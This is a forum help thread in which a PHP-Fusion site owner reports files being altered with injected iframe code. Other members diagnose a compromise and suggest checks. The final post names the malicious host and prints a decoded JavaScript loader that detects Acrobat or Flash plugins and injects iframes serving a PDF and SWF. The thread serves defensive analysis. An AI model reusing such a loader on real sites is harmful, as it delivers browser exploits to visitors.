placing raw html within php code (iframe tag) by a hacker may be
Asked Modified Viewed 4,542 times
asked
Hi
I was always getting white pages or errors on my site every now and then and now started to becoming that way every day so I searched more to see what is the problem, I used to solve my problem by re-uploading a fresh copy of the files and that would work, but it is pain to do that every time and also I might be away for weeks and not to be able to follow up, so i decided to see whats the problem and it was like someone or a virus or hacker, I am not sure, is replacing some of the php code at the end of certain pages and put raw html code within the php code and erase the end of the page.
I will attach screen shots so you guys see whats going on and any little help might fix the problem would be appreciated.
Thank you
Lisa
I was always getting white pages or errors on my site every now and then and now started to becoming that way every day so I searched more to see what is the problem, I used to solve my problem by re-uploading a fresh copy of the files and that would work, but it is pain to do that every time and also I might be away for weeks and not to be able to follow up, so i decided to see whats the problem and it was like someone or a virus or hacker, I am not sure, is replacing some of the php code at the end of certain pages and put raw html code within the php code and erase the end of the page.
I will attach screen shots so you guys see whats going on and any little help might fix the problem would be appreciated.
Thank you
Lisa
answered
You've been hacked. Which version is your site?
Look in all your folders for any files that don't belong. They generally have gibberish names, frtewch.php. But, not always.
Also, read this...
[url]
http://php-fusion.co.uk/forum/viewthread.php?thread_id=21480[/url]
Look in all your folders for any files that don't belong. They generally have gibberish names, frtewch.php. But, not always.
Also, read this...
[url]
http://php-fusion.co.uk/forum/viewthread.php?thread_id=21480[/url]
bite
bite 10
- Member, joined since
- Contributed 163 posts on the community forums.
- Started 5 threads in the forums
There is no way from browser to do such thing, this can be done only by person who has access to the FTP!
Is the hosting provider trusted or is this regular free hosting? This can be done not by hacker but also by hosting provider!
Also scan PHPFusion with this script.
Is the hosting provider trusted or is this regular free hosting? This can be done not by hacker but also by hosting provider!
Also scan PHPFusion with this script.
answered
I am using the latest version of php-fusion it is v7.00.5
I have installed 7.00.3 then updated it and I always make sure that my version is up to date to avoid problems.
I think bite is right, there is no way for such thing to be done from the browser, also I trust my hosting provider I have been using their service for almost 2 years and never had any problems with other php CMS at all to be honest, however I will be calling my hosting provider, it is not free hosting.
I have read the post you told me to read HobbyMan and will double check on my server again.
Thanks for help, and if some people have faced this problem before and got it resolved somehow, I would like to hear from them.
Thanks again.
Lisa!
I have installed 7.00.3 then updated it and I always make sure that my version is up to date to avoid problems.
I think bite is right, there is no way for such thing to be done from the browser, also I trust my hosting provider I have been using their service for almost 2 years and never had any problems with other php CMS at all to be honest, however I will be calling my hosting provider, it is not free hosting.
I have read the post you told me to read HobbyMan and will double check on my server again.
Thanks for help, and if some people have faced this problem before and got it resolved somehow, I would like to hear from them.
Thanks again.
Lisa!
answered
The reason I asked for your site version is because you posted in the v6 forum and certain v6 versions had a security hole in search.php allowing sql injections
As you're using v7.00.05 and so far there's been no reported breaches, I would check out any infusions, panels or mods that you installed prior to this first happening.
You're not the only one...
http://www.codingforums.com/showthrea...p?p=825328
--
As you're using v7.00.05 and so far there's been no reported breaches, I would check out any infusions, panels or mods that you installed prior to this first happening.
You're not the only one...
http://www.codingforums.com/showthrea...p?p=825328
--
Edited by HobbyMan on 07-06-2009 00:34,
bite
bite 10
- Member, joined since
- Contributed 163 posts on the community forums.
- Started 5 threads in the forums
@HobbyMan: this html code has nothing to do with SQL Injections, this is editing of files who haven't got write permissions.
Ok, after reviewing: hugetoplocate.cn:8080/index.php i found packed javascript, here is decoded version of that script:
Ok, after reviewing: hugetoplocate.cn:8080/index.php i found packed javascript, here is decoded version of that script:
Code Download source
function Ofq42i(){try{for(i=0;i<=navigator.plugins.length;i++){name=navigator.plugins[i].name;if((name.indexOf("Adobe Acrobat")!=-1)||(name.indexOf("Adobe PDF")!=-1)){document.write('<iframe src="cache/readme.pdf"></iframe>')}if(name.indexOf("Flash")!=-1){document.write('<iframe src="cache/flash.swf"></iframe>')}}}catch(e){}}Ofq42i();Category Forum
Bugs and Errors - 6Labels
None yet
Statistics
- Views 0 views
- Posts 5 posts
- Votes 0 votes
- Topic users 3 members
0 participants
Notifications
Track thread
You are not receiving notifications from this thread.
Related Questions